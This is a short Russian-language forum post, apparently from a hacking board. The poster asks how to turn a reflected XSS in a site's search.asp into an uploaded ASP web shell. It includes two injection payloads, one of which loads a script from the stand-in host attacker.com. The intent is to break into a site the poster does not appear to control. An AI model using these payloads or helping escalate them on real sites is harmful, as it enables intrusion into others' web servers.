Привет народ!

Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
_http://site.com/search.asp?query="><script>alert()</script>

хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
_http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.

Подскажте плз...

//ЗЫ: Со снифером дело отпадает....